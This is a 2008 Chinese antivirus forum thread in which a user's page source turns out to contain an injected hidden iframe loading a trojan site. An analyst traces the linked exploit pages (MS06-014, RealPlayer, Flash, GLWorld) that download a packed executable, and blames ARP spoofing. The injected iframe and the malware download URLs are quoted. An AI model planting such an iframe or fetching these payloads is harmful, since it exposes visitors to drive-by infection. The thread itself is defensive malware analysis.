瑞星卡卡安全论坛

首页 » 技术交流区 » 可疑文件交流 » 大家看一下,浏览本网页的源文件是否正常?
yannian - 2008-6-9 16:47:00
<iframe src=http://3.trojan8.com/index.gif width=100 height=1></iframe>                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-3169713-9");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-3169713-9");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<title>
可疑文件交流 - 瑞星卡卡安全论坛bbs.ikaka.com
</title>

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
楚茗 - 2008-6-9 16:49:00
一开头就是句
<iframe src=http://3.trojan8.com/index.gif width=100 height=1></iframe> 
好像不正常啊
yannian - 2008-6-9 16:53:00
我也知道不正常
啥原因,如何解决啊?
轩辕小聪 - 2008-6-9 18:22:00
http://3.trojan8.com/index.gif,连接多个网页,利用多个漏洞下载木马:

1.http://3.trojan8.com/1.gif
自定义函数加密,通过将其中的"document.write(w);"修改掉,或直接hook掉document.write,可得到解密结果。
利用MS06-014漏洞,下载http://xnibi.com/mm.exe
2.http://3.trojan8.com/2.gif
解密方法同上,另使用shellcode解密
利用联众世界GLWorld的漏洞,下载http://xnibi.com/mm.exe
3.http://3.trojan8.com/newlz.gif
链接失效
4.http://3.trojan8.com/bf.gif
链接失效
5.http://3.trojan8.com/4.gif
shellcode使用ALPHA2方式加密
利用RealPlayer漏洞,下载http://xnibi.com/mm.exe
6.http://3.trojan8.com/3.gif
解密方法同1。shellcode加密方式同5
利用RealPlayer漏洞,下载http://xnibi.com/mm.exe
7.http://3.trojan8.com/swf.htm
利用flash漏洞,由于细节需要调试,在此不想浪费时间了,估计也应该是下载http://xnibi.com/mm.exe
轩辕小聪 - 2008-6-9 18:29:00
mm.exe,外层一层NSPack,再里层一层未知的壳,估计是为了对付脱壳机的。
原样本及脱壳后的文件在附件。

附件: mm.rar
轩辕小聪 - 2008-6-9 18:34:00
本版区的网页并没有问题,楼主应该是受到ARP病毒攻击,才导致浏览到的网页中被插入病毒链接。
如有使用瑞星防火墙,并且网址过滤功能打开,则已经过滤了这个网页,因此不会有危害。
防ARP可以使用瑞星防火墙的相应功能,或使用其他的防ARP工具。
1
查看完整版本: 大家看一下,浏览本网页的源文件是否正常?
© 2000 - 2024 Rising Corp. Ltd.